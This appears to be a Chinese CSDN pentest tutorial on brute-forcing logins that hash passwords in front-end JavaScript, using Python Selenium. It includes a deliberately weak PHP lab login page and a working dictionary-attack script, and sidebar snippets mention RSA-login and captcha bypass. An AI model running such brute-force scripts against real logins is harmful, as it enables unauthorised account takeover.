Python+selenium绕过前端js加密暴破登录

最新推荐文章于 2024-06-06 22:45:00 发布
最新推荐文章于 2024-06-06 22:45:00 发布
阅读量1.5k 收藏 5
点赞数 1
分类专栏: Python脚本 文章标签: python selenium 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605352/article/details/119326165
版权

0x00 前言

有时在暴破登录框时,密码字段被加密了,不知道加密算法的话对暴破的进行会产生障碍,下面有几种解决方法。

  1. 分析前端 js 加密脚本。了解加密过程后用编程语言重写,将密码本加密后进行暴破。
  2. 利用相应工具或模板执行该 js 文件,拿到输出结果(python自带execjs)
  3. 使用 python 的 selenium 库来模拟浏览器自动化点击,绕过加密和时间戳。

快速定位前端加密方法:https://gv7.me/articles/2018/fast-locate-the-front-end-encryption-method/

0x01 Selenium基础

定位元素:

定位一个元素定位多个元素含义
find_element_by_idfind_elements_by_id通过元素id定位
find_element_by_namefind_elements_by_name通过元素name定位
find_element_by_xpathfind_elements_by_xpath通过xpath表达式定位
find_element_by_link_textfind_elements_by_link_tex通过完整超链接定位
find_element_by_partial_link_textfind_elements_by_partial_link_text通过部分链接定位
find_element_by_tag_namefind_elements_by_tag_name通过标签定位
find_element_by_class_namefind_elements_by_class_name通过类名进行定位
find_elements_by_css_selectorfind_elements_by_css_selector通过css选择器进行定位

webdriver模块常用方法:

方法说明
set_window_size()设置浏览器的大小
back()控制浏览器后退
forward()控制浏览器前进
refresh()刷新当前页面
clear()清除文本
send_keys (value)模拟按键输入
click()单击元素
submit()用于提交表单
get_attribute(name)获取元素属性值
is_displayed()设置该元素是否用户可见
size返回元素的尺寸
text获取元素的文本

参考链接:https://blog.csdn.net/weixin_36279318/article/details/79475388

0x02 模拟登录

因为是模拟点击,所以效率相对低一些。有的 js 加密结果有时间戳的影响,每次加密结果不一样,而使用Selenium模拟登录不会受其影响。

模拟环境:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.vuln.com/test/login.php/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.vuln.com/test/login.php">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>test</title>
    <script src="md5.js"></script>
    <script>
        function md5passwd(){
            passwd = document.getElementById("password").value;
            document.getElementById("password").value = hex_md5(passwd);
            return true;            
        }
    </script>
</head>
<form action="login.php" method="post" onsubmit="return md5passwd()">
        <table width="450" border="0" bgcolor="#000000" cellspacing="1" cellpadding="2"><!--cellspacing指相邻单元格之间的间距,cellpadding指控制单元格内部文字与边框的边距-->
        <tbody>
            <tr height="30">
                <td colspan="2" align="center" bgcolor="#CCCCCC"><font size="5">login</font></td>
            </tr>
            <tr height="30">
                <td width="150" align="right" bgcolor="#E6E6E6">username</td>
                <td width="300" bgcolor="#E6E6E6">
                    <input type="text" name="username" id="username" maxlength="20" size="15" /></td>
            </tr>
            <tr height="30">
                <td align="right" bgcolor="#E6E6E6">password</td>
                <td bgcolor="#E6E6E6">
                    <input name="password" type="password" id="password" size="15" maxlength="20" value=""/></td>
            </tr>
            <tr height="30">
                <td align="center" colspan="2" bgcolor="#CCCCCC">
                    <input type="submit" name="submit" id="submit" value="submit" />
                </td>
            </tr>
</form>
<?php
if( isset( $_POST[ 'username' ] ) ) {
    $user = $_POST[ 'username' ];
    $pass = $_POST[ 'password' ];
    echo "username: ",$user;
    echo "<br>";
    echo "password: ",$pass;
    echo "<br>";
    if ($pass == "8a30ec6807f71bc69d096d8e4d501ade" and $user == "admin"){
        echo "login successfully!";
    }else{
        echo "Login failed!";
    }
}
?>

当用户输入的账户密码为:admin / admin666 时登录成功

源代码:

from selenium import webdriver

driver = r'C:\Program Files\Mozilla Firefox\geckodriver.exe'
browser_option = webdriver.FirefoxOptions()


def start_firefox():
    browser = webdriver.Firefox(executable_path=driver, options=browser_option)
    browser.start_client()
    return browser


# url地址
browser = start_firefox()
browser.get("http://10.11.35.244/test/login.php")

def main():
    # 打开字典
    passwords = open("pass.txt", 'r', encoding='utf-8')
    passwords.seek(0)
    for password in passwords:
        # 标签位置
        user_name = browser.find_element_by_id('username')
        user_pass = browser.find_element_by_id('password')
        submit = browser.find_element_by_id("submit")

        user_name.send_keys('admin')
        user_pass.send_keys(password)
        submit.click()
        if 'failed' not in browser.page_source:    # 根据页面返回特征判断
            print('\n[+] 破解成功: ' + password)
            break
if __name__ == '__main__':
    main()

在这里插入图片描述
使用 selenium 不仅可以在不知道加密算法的时候暴破登录框,还可以在请求带有时间戳标记时暴破验证码,遇到了再补充吧。

参考链接:
https://segmentfault.com/a/1190000010179232(绕过前端加密进行爆破)
https://www.jianshu.com/p/b85f7d4f8c49(python模拟浏览器登录,绕过加密进行爆破)

yAnd0n9
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
selenium+python实现自动化登录的方法
12-25
Selenium Python 提供了一个简单的API 便于我们使用 Selenium WebDriver编写 功能/验收测试。 通过Selenium Python的API,你可以直观地使用所有的 Selenium WebDriver 功能 。Selenium Python提供了一个很方便的接口来驱动 Selenium WebDriver , 例如Firefox、Chrome、Ie,以及Remote,目前支持的python版本有2.7或3.2以上. selenium 可以自动化测试、抢票、爬虫等工作。初次了解,现在模拟登录百度——即自动打开浏览器、自动输入账号密码并提交进行登录。 工作需要实
Python安全之突破RSA加密进行暴力破解
weixin_43853965的博客
02-01 2460
背景: 在对某网站进行安全测试的时候,发现登录密码是加密的,而且同一密码每登录一次生成的密文都不相同,用Burp对登录接口进行重放,发现并没有什么限制,由此初步推断是可以进行暴力破解的。但是由于密码是加密的,使用Burp的暴力破解模块无能为力,于是自己用Pyhon编写了个暴力破解的脚本。 分析: 在用Burp对登录接口进行重放时,删除了一些参数,都未对响应结果产生影响。由此推断,要暴力破解,只需搞...
[1286]python执行js代码方法汇总(PyExecJSJs2Py、py-mini-racer)
最新发布
周小董
06-06 1416
在平时爬虫过程中,我们会遇到网站对js文件加密,无法爬取,现在就让我们来了解一下js2py模块,它可以对js文件进行解密。
如何使用 PythonSelenium 自动破解极验验证码
askdjchjsdbgvk的博客
07-02 488
接着,需要获取前后两张图片的位置和宽高,并获取整个网页的截图进行裁切。最后一步是模拟拖动,经过多次试验,发现完全模拟加速减速的过程通过了验证,因此使用物理学的加速度公式进行加速减速运动即可完成验证。极验验证码的特点是,首先需要点击按钮进行智能验证,如果验证不通过,则会弹出滑动验证的窗口,拖动滑块拼合图像进行验证,之后生成三个加密参数,通过表单提交到后台,后台还会进行一次验证。极验验证码是一种应用广泛的验证码解决方案,特别是在反爬虫的应用场景中,被认为是最佳选择之一。:return: 验证码位置元组。
Selenium绕过前端加密
LainWith的博客
08-21 665
我们可以使用CSS表达式很容易的找到用户名、密码、登录按钮的位置,通过分析登录之后页面的变化,可以找到页面的返回结果,最终得到一个基础的脚本。会访问到一个js页面,最后POST请求登录网站,ua也是正常的。从流量中可以看到,在网站加载出来后,就开始反复爆破了。第6~9行代码,添加bp代理。还是上面的pikachu靶场。尝试固定用户名,爆破密码。感受一下实时爆破画面。
Python selenium+cookie实现免密登陆
qq_37637818的博客
02-21 5032
今天爬取airbnb的租房数据时,遇到了登陆问题。自己动手解决了一下。 我们知道,http是无状态的,那么网页如何实现用户登陆注册功能呢?Session和Cookie就是为了满足这种需求出现的技术。 首先介绍一下Session和Cookie的概念。 在Web中Session对象存储特定用户会话所需的属性及配置信息。这样,当用户在应用程序的Web页之间跳转时,存储在Session对象中的变量将不会丢失,而是在整个用户会话中一直存在下去。当用户请求来自应用程序的 Web页时,如果该用户还没有会话,则Web
python+selenium+unittest环境搭建1
08-08
Python+Selenium+Unittest环境搭建详解 Python+Selenium+Unittest环境搭建是自动化测试中的一种重要组件,本文将详细介绍如何搭建Python+Selenium+Unittest环境,并解决在搭建过程中可能遇到的问题。 一、安装...
基于python+pytest+Selenium+allure,完成web自动化测试框架的搭建.zip
01-11
基于python+pytest+Selenium+allure,完成web自动化测试框架的搭建,并可以在jenkins上持续集成,应用于课堂派web自动化测试项目中,取得良好效果 软件开发设计:应用软件开发、系统软件开发、移动应用开发、网站开发...
python+selenium个人开发的自动化测试框架
01-27
在网上或者测试行业现阶段分析了一下,python这门语言学习起来简单一些但是功能强大,最后2016年下半年决定在空余时间学习研究python+selenium,最终在年底开发出来一个可使用的基于web页面的自动化测试框架。...
python+selenium+unittest自动化测试demo
10-09
Python+Selenium+Unittest自动化测试框架是一个强大的组合,用于高效地进行Web应用的自动化测试。在本示例中,我们看到一个基于这三个组件构建的自动化测试项目,它提供了丰富的功能,如测试用例管理、批量执行、...
python+Selenium+pytest+MySQL基于PO模式的UI自动化框架.zip
02-15
包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。 包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python...
selenium+python实现自动登录脚本
12-25
os:windows 前提:Pythonselenium,IEDriverServer.exe,ie浏览器 首先安装Python2.7 安装成功后,计算机联网状态下在cmd命令行下输入:pip install -U selenium selenium安装后,在selenium官网下载IEDriverServer.exe 将IEDriverServer.exe放到ie浏览器的安装目录下:C:\Program Files (x86)\Internet Explorer,并将该目录添加到计算机的环境变量中 测试webdriver: 在Python命令行下敲入命令: from selenium i
JS逆向时碰到了恶心的死代码怎么办?手把手教你解决
静觅
06-17 1564
“ 阅读本文大概需要 3 分钟。 ”你是否也曾有过「在逆向时看到一大坨代码,但自己却无从下手」的遭遇?你是否也曾有过「跟着代码跳了很久之后,才发现那一大坨代码其实没有任何作用」的惨痛经历...
python爬虫六(selenium使用,js加密(混淆))
qq_37623764的博客
04-14 2654
selenium和爬虫之间的关联? 1、非常便捷的捕获到任意形式动态加载出来的数据。真正实现了可见即可大,但是爬取数据效率低。 2、帮我们实现模拟登录,有些大型的网站确实不好模拟。就可以用seleniumselenium捕获动态加载数据: seleniumpython中的使用方法: 1、下载chromedriver,是基于浏览器的selenium驱动程序,作用是让selenium能启动谷歌浏...
Python之网络爬虫(selenium爬取动态网页、爬虫案例分析、哈希算法与RSA加密
Viewinfinitely的博客
07-03 902
文章目录一、selenium爬取动态网页二、爬虫案例分析三、哈希hash算法与RSA加密 一、selenium爬取动态网页 1、动态网页认知 爬虫其实就是在模仿浏览器的行为 应对要多次数据的交互模拟的网站,我们有时会遇到像淘宝这样的大型网站,对数据版权看得特别重的,它们的网站有大量的工程师和技术人员去维护,它们也可能在技术手段上采用多次交互数据包的方式来完成网站服务器与用户浏览器之间的交互。如果此时还采用传统的分析数据包的方式会比较的复杂,难度较高。 对于这类网页的爬取,我们的解决方案是: Seleniu
Python突破JS加密限制,进行逆向解密
python56123的博客
05-13 1064
嗨喽~大家好呀,这里是魔王呐 ❤ ~!
python自动化脚本加密_如何通过python+selenium实现:修改加密的代理IP
weixin_39543647的博客
12-17 265
我需要通过修改IP来发送请求,完成一个功能测试。于是想到了用自动化,先打开Chrome浏览器,然后修改IP信息。但是IP是加密的,所以每次自动化脚本都会卡住,需要手动输入账户、密码才...我需要通过修改IP来发送请求,完成一个功能测试。于是想到了用自动化,先打开Chrome浏览器,然后修改IP信息。但是IP是加密的,所以每次自动化脚本都会卡住,需要手动输入账户、密码才能继续。所以想问下大家,sel...
python + selenium实现自动登录操作(以淘宝为例)
m0_61720747的博客
03-25 8270
selenium操作不熟练的可以查看一下这篇文章:selenium操作大全 一、登录前准备操作 定位一下相对应html位置,输入一般为input标签、登录按钮一般为button。 输入账号密码那块: 定位代码: driver.find_element_by_xpath('//input[@type="text"]').send_keys('账号xxxxxx') driver.find_element_by_xpath('//input[@type="password

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值